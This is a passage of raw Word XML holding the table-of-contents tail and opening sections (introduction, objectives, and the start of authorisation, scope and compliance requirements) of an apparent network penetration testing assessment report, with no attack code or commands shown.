          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FF270" w14:textId="2682C419"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        4.3.2 Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56247DD7" w14:textId="2D9095FB"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4.3.3 Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC8210" w14:textId="270C2CF4"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4.3.4 Recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02167B4E" w14:textId="38A36286"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4.4 Attack 4: Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33850A7F" w14:textId="36BD56DD"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4.4.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F07598" w14:textId="56464A26"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4.4.2 Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DC0F53" w14:textId="0D04FA33"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4.4.3 Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544CB74" w14:textId="75649550"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4.4.4 Recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3DF4FC" w14:textId="0C43DC3A" w:rsidR="00C444B0" w:rsidRPr="00C444B0" w:rsidRDefault="00C444B0" w:rsidP="00C444B0">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk163706126"/>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5.0 Additional Items</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC4B33" w14:textId="5AE83926"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5.1 Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DD3B1" w14:textId="0CC65DA3"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5.2 Lessons Learned</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F2A5C" w14:textId="40207A8E" w:rsidR="00C444B0" w:rsidRPr="00C444B0" w:rsidRDefault="00C444B0" w:rsidP="00C444B0">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    5.3 Future Recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A7B3B" w14:textId="7DF19723" w:rsidR="00AB42B3" w:rsidRPr="00963529" w:rsidRDefault="00C444B0" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Arial Unicode MS" w:hAnsi="Roboto Regular" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C733A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    5.4 References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00C733A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C733A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00314E34">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00620F73">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:spacing w:val="5"/>
          <w:kern w:val="28"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:color="17375E"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00620F73">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AB42B3" w:rsidRPr="00AB42B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.0 Network Penetration Testing Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137687D6" w14:textId="77777777" w:rsidR="00AB42B3" w:rsidRPr="00AB42B3" w:rsidRDefault="00AB42B3" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB42B3">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84A29A" w14:textId="77777777" w:rsidR="004D0388" w:rsidRPr="004D0388" w:rsidRDefault="004D0388" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">The Network Penetration Testing Assessment Report provides a thorough summary of our appraisal of the network's security position. Our objective is to identify specific weaknesses in the network architecture that could be manipulated by hostile individuals. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">This paper provides the results of our evaluation, outlining detected weaknesses, testing approaches, and suggestions for reducing risks and improving network security. This research empowers stakeholders to make well-informed decisions on cybersecurity investments and risk management strategies by offering practical insights. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">It is essential to take into account these discoveries and suggestions within the organization's wider risk management structure and cybersecurity goals. To address the vulnerabilities that have been identified and to implement the recommended solutions, it will be necessary for different stakeholders to collaborate. This includes IT people, system administrators, and management teams. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FE8FB" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B41D1E0" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110"/>
    <w:p w14:paraId="08C02C1E" w14:textId="77777777" w:rsidR="00AB42B3" w:rsidRPr="00AB42B3" w:rsidRDefault="00AB42B3" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB42B3">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.2 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F692502" w14:textId="77777777" w:rsidR="00AB42B3" w:rsidRDefault="00AB42B3" w:rsidP="00040110"/>
    <w:p w14:paraId="75911181" w14:textId="1ACD025F" w:rsidR="004D0388" w:rsidRDefault="004D0388" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">The main purpose of the Network Penetration Testing Assessment is to analyze the security posture of the organization's network infrastructure by finding and analyzing any </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> and vulnerabilities. This evaluation attempts to: </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Identify vulnerabilities and misconfigurations within the network infrastructure that unauthorized persons or hostile actors might exploit. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Assess the efficacy of current security controls, policies, and procedures in place to </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>protect</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> against unauthorized access, data breaches, and other security risks. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0388">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Evaluate the organization's preparedness to identify, react to, and recover from cybersecurity events and breaches impacting the network environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69236941" w14:textId="77777777" w:rsidR="004D0388" w:rsidRPr="004D0388" w:rsidRDefault="004D0388" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54366508" w14:textId="77777777" w:rsidR="00AB42B3" w:rsidRPr="00AB42B3" w:rsidRDefault="00AB42B3" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB42B3">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.3 Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620E3032" w14:textId="0D4075A2" w:rsidR="00B427A7" w:rsidRPr="00B427A7" w:rsidRDefault="00B427A7" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">To enable the effective execution of the Network Penetration Testing Assessment, the </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> criteria were established:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. authority:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obtain specific authority from the organization's management or </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>designated</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> stakeholders to undertake the penetration testing examination. This involves requesting formal authority to execute security testing activities that may affect the availability, confidentiality, or integrity of network resources.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Scope Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> Define the scope and bounds of the penetration testing examination, including the particular systems, networks, and assets to be evaluated. Document any constraints or exclusions, such as production systems, key infrastructure, or third-party services that are out of scope for testing.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Rules of Engagement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> Establish rules of engagement detailing the authorized </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> and testing procedures that will be utilized throughout the assessment. Define approved testing methodologies, communication protocols, and escalation processes to guarantee transparency, </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>cooperation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>, and alignment with corporate goals.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Compliance standards:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adhere to appropriate legal, regulatory, and industry compliance standards regulating the conduct of penetration testing operations. Ensure compliance with </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> protection rules, privacy laws, and contractual duties </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> the processing of </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>sensitive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> information and personally identifiable data.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
